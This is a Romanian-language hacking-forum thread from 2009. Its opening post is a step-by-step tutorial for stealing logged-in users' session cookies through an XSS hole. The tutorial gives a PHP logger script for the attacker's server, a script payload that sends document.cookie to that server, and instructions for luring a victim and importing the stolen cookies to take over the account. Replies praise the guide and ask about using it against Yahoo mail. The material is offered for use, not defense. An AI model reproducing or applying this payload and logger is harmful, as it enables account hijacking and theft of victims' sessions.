crs12decoder Posted January 8, 2009 Report Share Posted January 8, 2009 Marea majoritate ce gasesc posturi ale altor useri de pe acest forum si nu numai, ce contin site-uri vulnerabile la xss, isi pun intrebarea cu ce ii ajuta si cum se extrag.XSS-u este o vulnerabilitate ce permite extragerea cookie-urilor userului care viziteaza link-ul ce contine xss. In cazul in care userul este logat, cookie-ul detine informatiile sesiunii de logare, asta inseamna ca daca il furam si il inlocuim cu al nostru, putem accesa contul victimei fara sa-i stim credintialele.Presupunem ca am gasit o vulnerabilitate xss pe un anumit site. In primul rand avem nevoie de un site sau un server spre care cookie-ul va fi trimis. Presupunem ca aveti www.site-ulmeu.com. Puneti pe server un fisier denumit grab.php ce contine urmatorul cod php:<?php$cookie = $HTTP_GET_VARS["cgrab"];$fh = fopen('cookies.txt', 'a');fwrite($fh, $cookie . "\n\n");?> Uneori anumite servere nu permit crearea fisierului cookies.txt in cazul in care acesta nu exista, asa ca e bine sa-l creati voi, creati un fisier denumit "cookies.txt" si aveti grija ca acesta sa aiba drepturi de read si write.Dupa cum ati vazut, xss-urile care sunt postate in general sunt de forma <script>alert('xss')</script>. Asta doar demonstreaza ca site-ul este vulnerabil la xss. Scriptul pe care voi trebuie sa-l folositi este acesta:<script>document.location="http://www.site-ulmeu.com/grab.php?cgrab=" + document.cookie;</script>trimiteti link-ul cu xss-ul unui anumit user(care voi credeti ca este logat) iar cookie-ul va fi salvat in http://www.site-ulmeu.com/cookies.txttrebuie doar sa le luati si sa le adaugati in folderul cookies de la internet explorer sau sa le inlocuiti cu cele actuale. Astfel veti fi logat cu sesiunea victimei si veti avea drepturi depline asupra contului sau. 1 Quote Link to comment Share on other sites More sharing options...
CODEX Posted January 8, 2009 Report Share Posted January 8, 2009 nub mai sunt tutoriale din asta cu gramada si aici pe forum dar alora ce te-o intrebat le-o fo greu sa dea un serchoricum bun a fi si asta..cand cauta l-a gasii mai rpdsi inca ceva da zi sincer l-ai scris tu sau copy paste Quote Link to comment Share on other sites More sharing options...
crs12decoder Posted January 9, 2009 Author Report Share Posted January 9, 2009 1) nu sunt nub si te rog frumos sa nu te mai legi de mine. Daca ai ceva frumos de zis, zi daca nu, abtine-te si nu ma mai jignii.. deja m-am saturat cate rahaturi ai zis si eu am tacut. Eu nu m-am legat de tine in niciun fel si te rog sa faci si tu de asemenea. Nu oblig pe nimeni sa ma placa da nu-mi place sa fiu jignit ok?2) e scris de mine cap-coada.. . Daca era copy-paste de undeva mentionam sursa. nu sunt genu care se lauda cu munca altuia. Personal nu ma intereseaza parerea lu' codex despre mine atata timp cat stiu ce e al meu.Mi s-a parut ca majoritatea tutorialelor sunt explicate intr-un mod mai greoi si multi incepatori pun intrebari ori pentru ca nu cauta, ori pentru ca nu inteleg... atata tot.. ar trebui sa fie selectionat unu dintre tutoriale si sa fie postat undeva pe forum unde va fi mai vizibil pentru ca sunt sigur ca cel putin 60% din cei care se uita pe forum nu au idee cum se extrage un xss in concretcand cauta l-a gasii mai rpdcam asta era ideeasper ca de acum vei inceta cu jignirile. Quote Link to comment Share on other sites More sharing options...
s33us00n Posted January 20, 2009 Report Share Posted January 20, 2009 mie imi place cum l-ai scris:)...as vrea sa te intreb niste chestii....poti sa-mi lasi si mie id-ul tau de yahoo messenger te rog, sau sa mi-l trimiti intr-un PM? multumesc anticipat! Quote Link to comment Share on other sites More sharing options...
Nytro Posted January 21, 2009 Report Share Posted January 21, 2009 mie imi place cum l-ai scris:)...as vrea sa te intreb niste chestii....poti sa-mi lasi si mie id-ul tau de yahoo messenger te rog, sau sa mi-l trimiti intr-un PM? multumesc anticipat!Nu poti sa trimiti un PM in care sa ii ceri ID-ul? Nu mai faceti posturi in care cereti ID... Quote Link to comment Share on other sites More sharing options...
black_death_c4t Posted January 21, 2009 Report Share Posted January 21, 2009 Nu poti sa trimiti un PM in care sa ii ceri ID-ul? Nu mai faceti posturi in care cereti ID...Arata-mi butonu daca tot zici de pm . Mi-o tai daca gasesc asa ceva la mine. Quote Link to comment Share on other sites More sharing options...
Guest Nemessis Posted January 21, 2009 Report Share Posted January 21, 2009 Quote Link to comment Share on other sites More sharing options...
MrRip Posted January 21, 2009 Report Share Posted January 21, 2009 offtopic : Nemessis ... mie unu nu imi apare . Care ar putea fi cauza ? Quote Link to comment Share on other sites More sharing options...
Flubber Posted January 21, 2009 Report Share Posted January 21, 2009 Tutorialul este nemaipomenit, acum am inteles faza cu XSS-ul.Apropo, te respect si mersi! Quote Link to comment Share on other sites More sharing options...
Kestor Posted January 28, 2009 Report Share Posted January 28, 2009 @neme & RipKid: Probabil merge numai pentru moderatori/admini.@black: Treci pe default theme si trimiti private-uri normal de acolo. Quote Link to comment Share on other sites More sharing options...
toxic92 Posted February 8, 2009 Report Share Posted February 8, 2009 cookie stealear merge doar cu xss de yahoo sau pot folosi si alte xss-uri de la alte site-uri pentru a accesa mailul de yahoo? Quote Link to comment Share on other sites More sharing options...
black_death_c4t Posted February 8, 2009 Report Share Posted February 8, 2009 xss intr-un subdomeniu yahu doar Quote Link to comment Share on other sites More sharing options...
